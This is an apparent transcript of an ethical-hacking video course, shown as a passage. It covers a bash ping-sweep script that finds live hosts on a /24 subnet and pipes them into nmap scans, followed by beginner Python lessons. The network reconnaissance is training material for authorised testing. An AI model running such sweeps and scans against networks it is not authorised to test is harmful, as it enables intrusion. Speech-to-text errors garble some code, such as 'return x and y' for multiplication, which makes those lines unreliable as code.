and we're going to say ampersand on this line and we're going to say done i'm going to explain what all this means okay so this is a loop that we've just created what we're saying is for the ip address and we're just declaring this this could be bob if you wanted to we just i'm just making it a name or a term that's easy for us to remember so we're going to say for ip but if you want to call this bob call bob for ip in sequence 1 through 254 so what sequence is doing is it's saying hey i want to count everything from 1 to 254. so 1 2 3 4 5 6 7 8 all the way to 254. this for loop means i'm going to do this every single time so 4 ip in 1 for ipn2 for ipn3 we're going to run this command until we're done so until this sequence has run 255 times it's done okay and now we're going to say i want to do a count of dollar sign ip so what we're saying here is for ip in sequence one through 254 go ahead and do a ping dash c for a count of one one nine two one six eight four two fifty four and here we're going to say 1.2.3 every time this loops over and over and over it's going to be incrementing that number through this sequence that's all we're doing this is a basic loop okay so we're going to keep going through and through and through now this will work if you plugged in your hard-coded ip address here this will absolutely work now we can improve this just a little bit if we want to so what's going on here is what we're going to say is if we wanted to run this we would just do dot forward slash and then ipsweep okay and this would work that's fine but we can make this a little bit better from a coding perspective we can come in here and we can give this a dollar sign one and that means argument one so what we're saying here is i want to give an argument instead so if you want to be technical this first dot forward slash ipsweep.sh that is argument zero so you can consider this dollar sign zero argument one would be what you type after that so this would be argument one argument two etc so in this case what we could do is we could say i wanna run one nine two one six eight four like this and this will run the dot 1.2.3 after it so you provide the argument it places that here in argument 1 and then it does the rest for you so this way you can specify your network and if you wanted to ping multiple networks you don't have to come back in here and keep changing this it just works so super easy this is a great little script for a slash 24 type subnet okay okay so let's go ahead and try running this really quick i'm going to just control s save this i'm going to close it we're going to do a chmod plus x on ipsweep if it'll allow us to we might have to do a okay let's do ls la real quick make sure it worked it sure did okay so here's what we're going to do we're going to run the ipsweep and we're going to say 192.168. you just put in your ip here i'm going to run that all right and you can see all the devices that are coming back within my network here i'm going to go ahead and hit control c cancel this out and so this is grabbing all the different devices in my network now that's great that works out really well but what we can do is improve this what if i typed in a what if i didn't type anything at all what if i just hit enter here now i'm just getting all kinds of pings unknown and it's going off of some of the stuff i was doing before but it just causes all kinds of issues and errors right so you can see i'm trying to hit control c it's it's taking its time to break um here we get issues because we're not we're just allowing any sort of argument here what we need to do is we need to fix this up just a little bit so what we can say is we can come back in here and just go mousepad ipsweep.sh and come in here and let's add a little bit extra oh and i also left this in here don't leave this in here that's why that was running twice okay so what we're doing here is we need to add in a statement what we're going to do is we're going to add in a if statement if statements are conditions we're saying hey if this condition is met do something for us if it's not met then go ahead and do something else all right so we're going to say if we're gonna just put in here dollar sign one is equal to nothing then we're going to go ahead and just say then echo you forgot an ip address echo syntax something like this we'll just say ip sweep sh and we'll go one nine two one six eight four like that okay and then if we did do this correctly if we do have an argument inside of argument one then we're going to say else do all of this here and be done and then we're going to end our if statement with fi now this script or this resemblance of this script is not one of my own by the way this is goes credit to something i've modified over time but the original credit definitely goes to georgia weidman i remember seeing this in her course a long long time ago when i was first getting started and she did a great job of teaching this this is just a modification of this script so i just want to make sure that all credit goes to her but looking at this let's break this down really quick before we run this again we've got an if statement we said if argument 1 doesn't equal anything then you're going to echo back out and say hey you forgot an ip address here's the syntax if it does include something then we're going to go ahead and come in here and say let's run our for statement or for loop and run through it and then we're going to end our if here the only thing that i'm doing uniquely here is i'm including this ampersand which is going to run this command um multiple times at once this is a good way to explain it basically we have a couple ways of doing this we could say like this we can put a command here and this will run one at a time it'll say okay four one four two four three this allows multiple instances of this loop to run at once and just speeds things up i can show you the difference between that so i'm going to go ahead and just control s save this i'm going to go ahead and just run this script real quick now let's try running it with without anything here okay now look it says you forgot an ip address so look we did that correctly now let's go ahead and add the 192 168.4 run it and you can see okay it's sweeping but it's taking its sweet time especially for the ip addresses that are going to hang like like if i don't have a dot 2 or dot 3 it's going to take a while so i'm going to control c and get out of this if it'll let me and it looks like it's actually going to hang so what we can do is we can come back in i'm going to open a new tab real quick just while that's waiting and i'm just going to say mousepad and we're just going to go back into ipsweep.sh it's in this folder there we go okay so from here i'm going to change this back to the ampersand and i'm going to save it i just want you to see the difference really quick and why i run it like this so ipsweep the sh192168.4 you can see it's picking everything up really fast all right what i can do now is i can run this and then store this into like ips.txt something like that just like found ip addresses okay so now if i cat ips dot txt i have all the ip addresses i just found and i found them that fast versus this which may still be going and it is and i can't even kill i'm just going to close this out okay so this is the big difference there with that ampersand and the speed and what it's capable of doing so with all that being said we could take this and do one more thing so i want to show you how we can utilize a one-liner these are called one-line statements in in bash and we can do similar to what we just did and accomplish that in this command line so now we have an ip address we have a list of ip addresses let's say that we want to run nmap now we haven't gotten to nmap yet you don't need to really know about it just know that it is a tool that allows us to go out and do port scanning okay so typically we would just say something like nmap and we might do something like uh dash t4 dash a dash p dash like this this is just saying i want to run map scan i want to look at everything and i want to scan all ports this is just an example you can just run map ip address like this and that would be fine too like we could just go 192 168 4.29 and we'll do a quick map scan okay but what we can't do here is we can't just say hey i want to run well we could we could say i want to run nmap for everything in 0 24. the issue is it's going to take time looking and finding what i p addresses are valid here if we have a list we can automate this process quite a bit we can just come in here and we can say something a little bit different we can say hey 4 ip we're using the same kind of syntax in dollar sign and we're going to put parentheses here we're going to say cat and then we're going to say ips.txt and then we're just going to do this we're going to say do nmap dollar sign ip and then again we have the option of doing done or we can do ampersand done just like this okay i'm just going to do done here as an example and just show you so this is really easy we're saying hey for every ip address in this list and all we're doing is we're cutting out this ip list that we just had so it's going to take the first ip then run the maps again and it's going to come back and run the next one so until this list is completely done it's going to keep going through this loop that's all it is a simple loop then we're going to say done it's going to take that ip address it's going to start scanning it it's going to go through and hopefully find information and go in a loop so this is a quick way to automate some of this process i actually do this with a lot of my scripts where i will do some probing see if anything is out there that's alive put it into an ip file and you're going to see this later in the course and then nmap scan that so think about this hopefully this gets your wheels spinning on what you can do to really start scripting some of this stuff out and this is gonna be the first time you get your hands dirty with scripting we're gonna go on again with this and we're going to get more advanced as we go but this should be a good introductory lesson to you on how we can build a simple tool and automate a lot of this process fairly easily with just a little bit of command line syntax so we're going to go ahead and move on to the next section and i will see you over there welcome to this module on python so if you've never used python before or even heard of python before python is a coding and scripting language it is commonly used in ethical hacking and it's commonly used all around the world it is actually considered one of the best beginner languages to start with if you've never learned coding before so that's exactly what we're going to do we're going to cover some of the basics of python so we'll cover everything you see on this screen here strings math functions we're going to get into conditional statements and looping we'll get into some more advanced items and eventually we're going to build our own tools so we're going to be building a port scanner at the end of the lesson and then when we get into the exploit development section of this course we're going to use python again to write our own exploits so it's going to be used throughout the course you're going to see it again as a ethical hacker as well you're going to go onto websites and you might need to download python code or something to utilize against a host or a client and it's just going to be frequently seen for you so very important topic to cover especially for the foundations one very big thing to point out you do not have to be a developer to be successful in penetration testing the important thing is that you understand what you're seeing and understand how to read code if when you come away from this module you have a better understanding on how to read what you are seeing in code you'll be much better off by no means you have to be a developer i am still to this day nowhere near a developer level and i am very very successful in what i do you don't have to be a developer so the big takeaway here is to take very good notes understand what you're seeing if you need to watch a video multiple times in this section absolutely okay just make sure you understand everything in front of you and understand that the lessons are going to build upon each other and it should all come together in the end and you're going to get to see it over and over through the course especially in the exploit development section where we write our own python script so i look forward to teaching you this module on python and look forward to seeing you in the next video welcome to your first video on python so in this python series we're going to cover a lot of different topics and we're just going to build upon them slowly so that everything builds kind of upon the last lesson so in this first lesson we're going to be talking about strings and we're going to be working primarily in python 3. so quick thing to note is that my cali interface might look a little bit different i'm on my personal pentest machine here the only reason i'm doing that is because when we get into the text editor my text editor on the newer version of cali would not let me edit my preferences very easily so i went ahead and just went back to my machine that has an older text editor on it so you can follow along completely step by step in your your cali and you should be fine i just wanted to make sure that the font size is good enough for the recording so from here let's go ahead and make a new directory and i'm just going to call this directory python and then we're going to change directory into python and the first thing we're going to do is we're going to get it and i'm just going to call this first dot pi this will be our first python script and we're going to build on it so the first thing we need to do is declare what it's called a shebang so that is a hash bang like this and we're just going to declare bin python3 here at the top now what does this do this allows us to know or the linux to know when we run this say we were to run this like python3 and then we just say first stop pi if we run it like this then python interprets the hash here which you're going to learn a little bit as a comment so all this is commented out we don't have to worry about it but let's say we wanted to run this a different way we wanted to say dot forward slash first dot pi then it would actually be interpreted here at the top so linux would go in here and read this it would say hey this i'm going to go ahead and look for bin python3 it's going to find python3 in bin because that's where it's stored and then it's going to use that to execute python or this python script here so we have two ways of running it we can either run it python3 first dot pi or we can run it as you've seen it with some of our other scripts with the dot slash like this so i always like to declare at the top it's not necessary if you're just going to type in python 3 but i always like to do it so i'm going to give you some headers here so i'm just going to put a comment in and we're just going to say print string and so the first thing we're going to do is print a string now in the very stereotypical lesson the the very first string that most people print is the hello world so we're going to go ahead and just do that so let's go ahead and print hello world and we're going to do that by just typing in print and then in parentheses with quotation we're going to say hello world something like this okay and that's it so what we can do here is we can just save this and we can go ahead and give this a go so what we'll do is we'll say python3 and then we could say first and it'll auto tab out to first dot pi and you can see now that it wrote out hello world so if we go tab up twice and go back to our g edit we could see here that it ignored printing out anything here with the comment it didn't interpret this because this is a comment with the hash and we just told it one instruction which was to print hello world and it did just that so the nice thing about strings is we could use double quotes or we could use single quotes so we could say sorry hello world like this and we can also use multi-line strings so i'm going to tab or hit enter twice here and we could say something along lines of print and what if we have like a long quote we could say something like this string runs and then we can say multiple lines like this and we just put that with triple quotations like this and lastly we can do a little bit of what is called concatenation we could say something like print this string and then we'll want to put a space at the end here and end the quotation then we could put a plus sign in here and we could say something like awesome and end that parentheses so with all this you're going to see that okay we can print hello world it should print hello world hello world this string runs multiple lines and this string is awesome and it should be space awesome here because we included the space now you're going to notice even though we put line breaks in for us no line breaks are going to be printed we'll talk about that here in one second so let's save this and let's just run it so we're going to go ahead and run python 3 first dot pi and everything looks as anticipated right so i want to show you one thing let's tab up twice and let's put an ampersand at the end of this watch what this does now we have access not only to our script here but we can also run code as well so as long as we save this we can run the code and we don't have to keep exiting out back and forth so let's say that we did want to put a line in between these two hello worlds we've got this here what we can do is we can print this you can say something like a n like this if i could type today and we close this off and you can put a little note next to it so you remember and just say new line so when you have that backslash n that prints out a new line so let's say that and just take a look at that and there you go you have a new line put in there so quick and easy way to add a line in or line break and yeah so here very simple very simple lesson right all we're doing is just learning how to print things and we're dealing with strings so even if you want to go in and build upon this you can add comments in for yourself to make this easier so you can come in here and say double quotes you could say single quotes and then you can come in here and say triple quote for multi-line right and this way you know kind of what everything is doing uh this one you can say here you could say we can also concat innate i don't know if you spelled that correctly but i'm hoping i did so that's really it for this lesson just wanted to cover the basics so in the next lesson we're going to start talking about math and the math that python can do and again we're just going to continue to build upon this so i'll catch you over in the next lesson all right let's talk math so the nice thing about python is that right off the bat it has a built-in math interpreter so what we can use it for is addition subtraction multiplication division etc we can we could throw numbers at it and it'll do calculations for us so let's take a look at what that actually looks like so i'm gonna go ahead and get it we'll call this math.pi you can call this whatever you'd like by the way i'm gonna put the ampersand at the end again and we'll just declare our python3 here and then let's just call this math so the nice thing about math is we can do a lot of different things we're very flexible so for example we can print 50 plus 50 and here we're just adding right so let's take a look at what this looks like we go here and we just say python3 math dot pi you can see that it prints out a hundred now we can keep doing this for all sorts of different things right we can do 50 minus 50 we would expect zero here right and we can do print 50 times 50 and we can also do print 50 divided by 50 and divide so i'm going to give you a chance to catch up here i typed that very fast i also have notes that i'm looking at so a little bit of unfair advantage but so when we see these and we save this and we run it we're expecting everything to interpret just the way it did so you see 100 0 2500 and then this 1.0 which we'll get into in just a little bit as to why it's coming out in a 1.0 format but so we we have this here and we can also do some interesting things like let's do something fun let's do print 50 plus 50 minus 50 times 50 and divide by 50. and what do you think this is going to do our good old friend of pemdas if you remember that from math class so try it one more time see what number pops out pops out 50. so it also does more complex equations as well so there's a few other things that i want to show you in the math section and another thing to note i know i've already stressed this before and i'm going to keep stressing it is to make sure you take good notes this is absolutely going to feel overwhelming i'm going to throw a lot of things at you especially with all the stuff that you're learning take good notes have a good notebook and make sure you're writing this all down so then you can just go back and you can reference it and from here on out i'm the the next video what we're gonna do is we're going to make a script and we're just going to build upon it and i'll just leave everything in that script so that way you can have a place for all of your notes as well so here let's talk a couple more things so we can also do exponents so let's say we want to do 50 to the 50th power well we just write it like this and now we have exponents here save it run it really quick and we get this very very very large number right we could just make this to the second power and make a little bit simpler um we could also do this so we do print and we do 50 percent six now this is called a modulo let's take a look at what it does so 50 is not divisible by 6 right so what it does is it takes the number that is left over so we do 50 divisible by 6 okay 6 goes into it 8 times and then it has a leftover number of 2 right 6 times 8 is 48 left over number 2. so that's the modulo what if we were to divide by a number here and we said 50 divided by six what is that going to do to us well we print that out and you see it gives eight point three three three three four perfect that's fine what if we just want a number without any leftovers well we can do something like this you can do 50 divided by six and then we'll just say no leftovers here okay so i'm gonna give you a second to catch up we'll hit save on this and we're gonna go ahead and run it and you can see that it just gives us gives us the eight doesn't give us that leftover of two that we had and put it into fraction form here or decimal form here so uh we have different ways that we can manipulate this numbers and we can do math on the fly there's also math modules which we haven't gotten to the modules yet but there are additional math items that we can pull into this like bringing in random numbers for example and other things that we can do more advanced calculations in python but as a base it does quite a bit of items for us and it is a essentially a built-in calculator so we can do a quick math on the fly if we need to so let's go ahead and from here we're going to move on to the next video we're going to start talking about variables and methods all right so let's talk about variables and methods so to do this we're going to make a new file so let's do g edit and we're going to call this one script.pi because in the last video i told you we're just going to start building off of these scripts and we're just going to keep it in one script and keep it going so let's get it script.pi we'll do one more shebang here of bin python3 and then we're going to go ahead and just build this out i'm going to drag this over just a little bit so let's put a another comment up here and we'll just call this variables and methods and let's define a variable so let me show you what a variable looks like and then we'll define what a variable really is so let's start with a quote and you can pick your favorite quote here we're just going to say something like all is fair and love and war okay so what's happening here is we are creating a variable of quote now a variable all you can think of a variable is as a placeholder so instead of typing out all is fair in love and war we can just call this placeholder at a later time and it knows hey i'm going to call this information so it's going to store this information inside of quote and then later we just call quote and it'll print it out so we can do something like print quote and save this and i forgot to ampersand so excuse me we're going to close it and let's just run script dot pi sorry python3 script dot pi you can see it says all is fair and love and war so if we g edit this and add the apersan now so we defined what was in our variable here which was this this string right we've talked about strings we put a string here as our quote and we printed the quote so if we didn't put the print in here we just we can copy this and just delete it if we save this and we go to print this now there's nothing telling this to print so we have quote and we have a quote stored in our quote variable but nothing instructing it to print so we can we can leave the print back in there just copy and paste it back and now it'll print that quote now we also have what are called methods okay so methods are basically functions that are available for a given object okay so don't worry too much about that description uh that's very a dictionary based description just think about what a method does so i'll show you these methods here so a method might look something like print quote and then let's say we want to make quote upper so in order to make it uppercase all uppercase we're just going to throw in this method of upper so we just say dot upper if we were to save that and print it look now the text is all uppercase and you can make a note in here if you want and just say makes it uppercase and we can copy this let's just copy this whole line like this and let's paste a couple here so we could also do something like lower for lower case or we could do something like title for title case and we can make notes here of lowercase and title case okay and we save that and when you print it what do you think is going to happen here so we're going to say all is fair in love and war all is fair in love and war and you can see in title case not perfect it's capitalizing the and here and the in and the is but it does capitalize every first letter as it's instructed to do here so these are methods there's also other things that we can do we can do something like say we want to get the length of this quote we want to know how many characters are inside the quote we can do something like print length of quote okay we can just say save and let's see what it prints out okay so 28. now it's 28 characters completely if we were to count this all up including the spaces there's 28 characters there so let's make this a little bit more interesting and let's talk a little bit more more about math and bring that into it and try to tie this all together with what we've learned so far so let's use your name let's define a variable of your name and we're going to set it as a string so my name is heath so we'll just say this is a string right and let's also define your age now i'm 30 and we'll say this is what is called an int or an integer okay and let's say what's your grade point average and my grade point average was 3.7 and this is what is called a float now what is the difference between an integer and a float well an integer has no decimal point a float does so if i was 30 day or 30 years and 27 days i might be 30.1 years old right but if i only define as an integer if i say int 30 then that's going to define that this number is an integer and nothing else same thing with float if we want to have the decimal point there we can float a number and define it as like 3.7 so let's make more sense of this we can print out the integer of my age and we can also print out the integer of my or we could say 30.1 and let's see what happens as we discussed here so let's save this and let's just print out those two and look it takes 30.1 and makes it 30 and it takes the integer integer of age and makes it 30 as well now what if this is 30.9 what do you think is going to happen do you think it's going to round it in fact does not round so you can see 30.9 still came out to 30 down here it doesn't matter it just takes this first number when we call an integer so make sure that if you ever use integer you know that it does not round so let's build upon this again we could take a string now and let's print out a string we could say something like my name is and then you could say plus name make sure you add the space in there right and you can also say [Music] space and i am space and then let's define an age so if we try to put age in here watch what happens so we're going to say age and we'll say space years old and let's save this here like this and i'll give you a second to catch up so again we're adding a space a space in the beginning space at the end space at the end here just so that we have the syntax right or else it's going to all bunch up together so let's try to print this out and you can see cannot concatenate a string not integer to string so this h here is sitting here as an integer you can't concatenate a string with an integer so how do we fix that well we can do here is we can actually put this into a string format so we'll just say string of age something like this and save it and now it makes it to a string so similar as we made something into an integer and how we can make something into a float we can also make something into a string so if we come through here and we hit enter you can see now that it works my name is heath and i am 30 years old so a couple more things to note what if we had something like our age and you know we got a year older well we can just say something like age plus equals one and we could say print our age now watch what happens age is now 31. even up until that point age has been 30 right you see age coming through here we're utilizing it in all three places now we print age down here and it's 31 because we have changed what is stored in the variable so again the variable here of age we had 30 stored in it up until the instruction is called to add 1 plus equals 1 so we're just adding 1 to this age variable here then it stays 30. now it is 31 until we change it again so we can also do something along the lines of birthday equals 1. so we have a value of birthday and then we could say age plus equals birthday and then you're going to print your age again and guess how old we're going to be we are going to be 32. so it doesn't matter how you store it you can do the plus equals here or minus equals if you wanted to take away and you can start incorporating your math into your variables you can incorporate your variables into your strings and you can start tying this all together so if you need to rewatch this and to make more sense of it that's absolutely fine i'm going to harp one more time on this take good notes practice practice practice this is stuff that can get overwhelming very quick but hopefully i'm explaining it slow enough and you're you're getting it if you're not getting it please do re-watch the video please take notes and please utilize outside resources as well i understand that i might not always be the best at teaching a particular subject or sometimes it takes another person hearing it again from somebody else to see this coding is not necessarily easy but once it clicks it clicks and a lot of it is just repetition so that is it for this video we've started to tie everything together now from here we're going to move into what are called functions and build upon all of this so i'll catch you over in the next video on functions all right let's talk about functions now functions are what i like to think of as mini programs it's like this organized block of code that you you define and then you can call it later it makes it a lot simpler than typing everything out so it's a lot easier to visualize this than me to just talk the theory of it so let's go ahead and let's ge edit our our script again our script dot pi and then we're going to ampersand this one this time and we should have our python script from before i'm just going to scroll down to the bottom and i'm going to add in a new section here and that section is just going to be called functions so if we want to print out we could print out a new line to kind of put this together and then maybe when it's all said and done we can print a function or make a function that just prints and make it a little bit easier for us so we're going to print a new line here define functions and maybe we'll just print out something that says here is an example function so this is really just going to define the area if we save it while you're typing yours i'm just going to print mine so we'll python3 script.pi and you see we've got the new line here and we see here is an example function and we just start from here so let's take a look at a function using something that we've already done before so we've got this section here and we've got name age gpa we're going to kind of reuse this and this print my name is so let's go ahead and reuse this we're going to say function here right so we're going to define kind of a who am i so we're going to define this and then we're going to do two parentheses and then a colon here so it's going to look like this and what's important now is that we use indentation now we haven't had to talk about indentation to this point but python is very very critical on utilizing indentation if you don't use it in the right places then your program will not function so it's very important to know when to use indentation and to indent properly so to indent i'm just going to tab here and i'm going to redefine everything again so we can just say name equals heath and we can just say age equals 30. type that wrong there and then we can just copy this print right here so we don't have to type it all out again just copy and paste it and you can see define who am i and we're going to define in this function a name variable an age variable and then we're going to print this out so if we were to just go ahead and save this and print this nothing nothing's here all we've done so far is just define this function we have done nothing to actually call it or or do anything and let's make a note here that this is a function right so when we get down towards the bottom [Music] let's go ahead and just try to call this function so to call a function all we got to say is who am i let's go ahead and save this run it again and look it says my name is heath and i am 30 years old well what's happening here okay so we're defining a set of things to do right this is a mini program and inside this mini program we've defined our variables and we defined an action here to take which is printing out this string so what it's doing is when we call this it's saying hey i'm going to go ahead and take all this and i'm going to run this program and give you the result now what's important to note is whatever is stored in these variables here is only stored there inside the function if we were to print age from the last video it should still be 32 i do believe so let's print and you'll see it's 32. even though we declared age up here as 30 that only lives inside this function so i'm going to go ahead and delete this so again everything is living inside this function and it's a mini little program that we have here and we just call it at a later time so let's go ahead and build out another function and we can kind of start to make sense of this so let's start with adding what are called parameters and we'll just do adding parameters here so let's make a function and this function is called add 100 like this okay and then the parameter i'm going to actually add inside instead of giving empty parentheses i'm going to add in something called num it's just going to be for number and then we're going to go ahead and use our colon hit enter do a tab and then what i want to do is i want to print number plus 100. so what am i doing here i'm taking a number and i'm adding 100 to it so my function of adding 100 makes logical sense okay so what's going to happen then if i say add 100 and then i specify a number in the parameter well i'm going to say what if i want to add 100 to 100 well then i should in theory print out 200 right and there you go we have successfully printed out 200. so we can build upon this even more so what if we want to use multiple parameters okay let's say we want to let's do multiple parameters and we want to define an add function we're just going to make an ad even though it's built into python we're going to make our own so we're just going to say add x and y so now we have two parameters here okay we're going to add our colon make sure we indent and then we're just going to say print x plus y now if we go in and we add 7 and 7 we should get 14. and there's 14. so hopefully this is starting to make sense all we're doing is building these mini programs and we can have no parameters as we saw up here we can have single parameters or multiple parameters depending on what we need so let's go ahead and build a couple more out just to make sense of it so what if we wanted to define multiply we'll just say x y again what do you think that's going to look like well instead of saying print what if we say return i'm going to throw something new at you i'm going to say return x and y okay now what happens if i call multiply and i say 7 7 again what happens here let's go ahead and save it well nothing happened we're not printing out to the screen all we're doing is returning so when i'm pulling this multiply in it's returning a certain number so i'm calling it here and it's saying hey 7 times 7 that's 49 but i have no idea what you want me to do with it now i could say print multiply here and then we can see what happens and now you see it's 49. so the return feature just allows us to return the number that is back to us right we don't have to always print it out if we don't want to we can store it for later so that's what we can do here so we don't always have to print it we can we can return the number and then call it later so that's one way of looking at it let's do one more how about we define square root and we only take one number here so how would we do the square root of something well let's go ahead and just print out x and then we're going to do by 0.5 remember the exponent with two multiplications here and then we're doing the square root so we're going to take 0.5 instead of squared which would be 2 right so we're taking the square root 2.5 and let's take an easy one let's return the square root of 64. so let's say square root of 64. and see what happens and it returns 8 for us now we can make that integer if we want to and go from there but that's just a nice base example so lastly i mentioned that we can make a function for a new line because we've been sitting in here and we've been just typing print and i am slow at it i have to sit here and think about it and then i find the correct letters and this is how you print new line okay i'm not the best at it but what if instead we just did something like define new line and then we just put this here so then we can just call a new line from here on out we could say a new line and then when this prints it'll print out a new line and while it's the same kind of length ish of this we don't have to type in the special characters look for them we could even shorten this to like nl something like nl and then make it really simple and then we save time and this is where these programs come in and they save time so good example of a use of a function so i'm going to save this if you want to use this for moving forward and going on in the next videos absolutely welcome to so if you're following along go ahead and just leave your text editor open and i will catch you over in the next video as we start to talk about boolean expressions welcome back so now we're going to discuss what are called boolean expressions and we can go ahead and just type this right into our text file if you don't have your file open with g edit go ahead and get your script dot pi open and what we're going to do is we're going to just put in here boolean expressions and that when we say boolean expressions we can just think of this as true or false so let's go ahead and print our new subject line we're just going to call these boolean expressions and from here let's start defining those so let's say we have boolean expression 1. we'll just call the variable bull 1. now let's just set that equal to true okay and let's give an example of that as well let's just say boolean two equals let's say three times three now what does 3 times 3 equals well that equals 9. so we can say equals equals to mean something equals something and so this number equals this number so 3 times 3 is 9 which equals 9. so if we take this expression and we say 9 equals 9 it's going to return true let's do a couple more so we could say boolean 3 equals false and boolean 4 equals 3 times 3 and then we can say does not equal 9 well that's not true right so that's false so if we were to print these all out we could say print boolean 1 boolean 2 both 3 and bool 4. okay and let's also print the type so we know about this so they say print type and let's take a look at what this looks like so once you have that all written out go ahead and just save this and go ahead and run your file and you can see that it came out exactly how we thought it would so we've got four variables and they're all boolean expressions right so we've got true this equals to true this is false and this is equal to false so we see true true false false when we print those all out and then when we want to look at the type of the variable so we say hey what's stored in here inside this variable what's stored is a boolean now please do note that there is a difference between true and true one is a string and one is a boolean so if you were to set boolean five for example to true and then you printed the type of boolean five then you're going to get a different result here you're going to see now that the type is a class of string so big difference here i'm going to go ahead and just delete this so this is just an overview of boolean expressions we're going to use this later on and you will see it again when we get into exploit development but you're going to see certain things especially when we get into loops as well so once we start getting into looping and we talk about that it'll make a little bit more sense but you want to know sometimes if something is true or something is false or when we get into conditional statements if something is true then do this or if something is false do this we haven't gotten quite that far yet but we need to introduce the concepts before we can build upon it so we're going to do in the next video is we're going to build upon these even more we're going to take relational operators and these boolean expressions and kind of combine them and start building upon it and then once we get this all put together it'll all start making sense so for now all you need to know is when i say boolean expression all i'm thinking about is true or false so we'll build upon that in later videos okay let's build upon where we just left off with the boolean expressions so now let's talk about relational operators and boolean operators so what do we mean when we say operator let's go ahead and just add a new section here and we'll just say relational and boolean operators if you want you can go ahead and just put a new line here so remember we specify a new line in a function and let's say greater than let's define a variable called greater than and let's just make that equal to seven is greater than five okay so we're using a operator here with the greater than symbol right and we're also using a boolean expression because when we say 7 is greater than 5 well that's going to come back with true and we could say less than we could say 5 is less than 7 and that's also going to return true what about greater than or equal to we can say 7 is greater than or equal to 7 and that's going to return true as well and then if you can think of less than or equal to it's going to be very similar we say 7 less than or equal to 7 and that's also going to be true so if we were to print all these out which we don't have to they're all going to return back true so there's other things that we can add in here so what if we bring in multiple operators for example we could say test and you can call this whatever you want so what if we say 7 is greater than 5 and 5 is less than 7. so we see here that this is true and this is true that would make this entire statement true so we could say true here if we were to say let's just call this test and 2 we were to say 7 is greater than 5 which is true and 5 is greater than 7 well that's not true so this whole statement is going to be false because we're going to say and and is very important here right what if we were to say something like or though if we were to say let's test out or we could say 7 is greater than 5 or 5 is less than 7. well this is going to return true and if we were to do the same thing as we did above where we say test or 2 and we say 7 is greater than 5 or five is greater than seven i forgot my parentheses here and this is also going to return true why because only one statement has to be true here for these both to be true in the instance of and both statements here have to be true in order for it to be true if one of them becomes false the whole thing becomes false in the sense of or or the case of or if both are true it's true if one or the other is true then it's true both have to be false for it to actually return false okay so you can print these out as well to test this out the other thing that we can say is we could say something like test not we can say something like not true and guess what not true is going to be false and if we said not false then that'll be true so these are the ones that can start to kind of get confusing so again my recommendation is to make good notes on this and then go out and study it and there are true false charts let's just see if we can google one quickly there are true false charts online we could say true false chart python and go to images and we can see truth tables is what they're called so if a is true and b is true the a and b are true if a is false or true and b is false then they're both false false true is false and false false is false so in order to have a truth table for and everything has to be true so if we search truth tables that might give us a better chart here and then you get something sort of like this where you have and where you see true true is true you have or where true false is still true and then xor we don't have to worry about right now so take good notes on these make sure you understand them we're going to continue to build upon them over time really all you have to think about though is you have to think about boolean operators and these expressions and the most important things to take away from this are not just the true and false but the greater than symbols the less than symbols all these different types of operators that we can utilize here and that we can also utilize things such as and or and not as well so we're just adding more tools to our toolkit and more things to think about where python is important when it comes to pen testing is not necessarily being able to develop and i've said this before i'm going to say it again being able to read and understand what is going on is super important being a developer not as important so as long as you see these things and you see a true or you see a statement like this when you're reading code and you say hey i know that's a boolean operator i know it's true or false and i kind of understand the truth tables right so that's really what we're after here so as long as you start getting this understanding and this comprehension that's really what we're after so from here we're going to move on and we're going to go into conditional statements and that is where we get into something called if then else and we'll have a little bit of fun with those so i will catch you over in the next video now we're moving on to conditional statements now you could think of conditional statements as an if else scenario for example if you go to the store and you want to purchase a drink and the drink cost two dollars well if you have two dollars you're gonna be able to purchase that drink if you don't have two dollars then you won't be able to purchase that drink that is a condition so the condition there is based on the amount of money you have we can take these conditional statements and we can run if else we could also run if else if else and build upon these now it all makes sense when we start putting it together in our script here so let's go ahead and just do that let's make a new line and let's make a comment here that says conditional statements and let's start with a conditional statement so conditional statement's going to start off looking like a function so we'll say define and here let's make the same scenario where we talked about the money and buying a drink so we'll define drink and we'll just say a parameter here of money okay and then let's indent and let's say if money is greater than or equal to two remember we talked about two dollars for this drink then we're going to return you've got yourself a drink now what if we don't have the money so we could say else if our money is not greater than or equal to two then we're just going to return no drink for you didn't mean to capitalize the o there but i'm leaving it because i like it so in this situation we have our condition set now again if our money equals or e is equal to or greater than two we're gonna get a drink and if not we're not gonna get a drink so it could be anything else right so what we can do now is since this is just returning and not printing anything we can print out something like drink and then we specify the amount so if we have three we should return one thing and if we print drink here with only a dollar we should return another so let's go ahead and save this script and i didn't put this with an ampersand so i'm going to close out and make sure i do that next time and we're going to do is we're just going to go ahead and python3 script.pi and you can see down here we go back and let me run the script with the ampersand you can see that we did a drink of three which we were expecting to return you got yourself a drink and we did a drink of one which we're expecting to return no drink for you this happened just the way we thought it would so we can build upon these conditional statements let's talk about a different scenario with multiple parameters let's say that you are an adult and here in the united states if you're an adult and you want to have a drink of alcohol that requires you to be of age at 21. so in order to purchase alcohol you have to be one of age and to have money now if you don't drink that's perfectly okay this is just a example scenario so here let's say we wanted to buy alcohol we have to meet that age requirement of 21 and we have to meet the requirement of money now we could be in a situation where we meet the age requirement but we don't meet the money or we could meet the money requirement but we don't meet the age requirement or we could be in a situation where we don't meet the age requirement and we don't meet the money requirement so let's set this up to think through this and how these scenarios could play out so let's define alcohol here and we need two parameters we're going to say age and money so first statement here is going to be our leading if and we're going to say if age is greater than or equal to 21 because we need that condition to be true and our money is greater than or equal to five so we'll say a drink costs five dollars we're going to return we're getting a drink okay now since we're going to have multiple conditions here we're going to introduce something called else if else if here is written like this e-l-i-f so else if our age is greater than or equal to 21 and our money is less than five dollars then let's return come back with more money we need another else here because we have another condition right so we're going to say what if our age is less than 21 and our money is greater than or equal to five well we're going to return nice try kid because we're not old enough to purchase this drink and then lastly in our else scenario if we are not meeting any of the conditions above which means we won't have the age we won't have the money then we're just going to return you're two like a type sorry you're two poor and two young so let's go ahead and run this a couple different times so let's go ahead and print out alcohol and we're going to give our two parameters let's say 21 and 5. print out again alcohol and let's give a parameter of 21 and 4 and then let's print out one last time of alcohol and we'll say that we are 20 and 4. so we should meet a few different conditions here right so at 21 and five we should return we're getting a drink at 21 and four we should return come back with more money and at 20 and four we should return you're two poor and two young now if you want to add in a fourth condition here or fourth print statement and you want to return the nice try kid you're more than welcome to do that as well so go ahead hit ctrl s or save your script out and then let's go ahead and run it and you can see we return exactly where we thought we were going to we're getting a drink come back with more money and too poor and too young so this is it for conditional statements hopefully this makes sense again our conditions are based on certain items right so money here for an example if we have the money we're getting a drink if we don't have the money we're not getting a drink and then we can build upon that we can have multiple parameters here so if we're not old enough to buy a drink or we don't have enough money to buy a drink or we don't meet any of these scenarios different things can happen what you need to be thinking about as 